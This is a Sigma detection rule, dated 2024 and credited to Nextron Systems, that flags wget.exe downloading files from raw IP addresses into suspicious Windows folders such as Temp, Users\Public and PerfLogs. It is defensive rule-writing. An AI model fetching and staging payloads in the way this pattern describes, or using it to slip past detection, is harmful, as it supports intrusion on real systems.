Suspicious File Download From IP Via Wget.EXE - Paths

 1title: Suspicious File Download From IP Via Wget.EXE - Paths
 2id: 40aa399c-7b02-4715-8e5f-73572b493f33
 3status: experimental
 4description: Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe
 5references:
 6    - https://www.gnu.org/software/wget/manual/wget.html
 7author: Nasreddine Bencherchali (Nextron Systems)
 8date: 2024-02-23
 9tags:
10    - attack.execution
11logsource:
12    category: process_creation
13    product: windows
14detection:
15    selection_img:
16        - Image|endswith: '\wget.exe'
17        - OriginalFileName: 'wget.exe'
18    selection_ip:
19        CommandLine|re: '://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
20    selection_http:
21        CommandLine|contains: 'http'
22    selection_flag:
23        - CommandLine|re: '\s-O\s'
24        - CommandLine|contains: '--output-document'
25    selection_paths:
26        - CommandLine|contains:
27              - ':\PerfLogs\'
28              - ':\Temp\'
29              - ':\Users\Public\'
30              - ':\Windows\Help\'
31              - ':\Windows\Temp\'
32              - '\Temporary Internet'
33        - CommandLine|contains|all:
34              - ':\Users\'
35              - '\Favorites\'
36        - CommandLine|contains|all:
37              - ':\Users\'
38              - '\Favourites\'
39        - CommandLine|contains|all:
40              - ':\Users\'
41              - '\Contacts\'
42        - CommandLine|contains|all:
43              - ':\Users\'
44              - '\Pictures\'
45    condition: all of selection_*
46falsepositives:
47    - Unknown
48level: high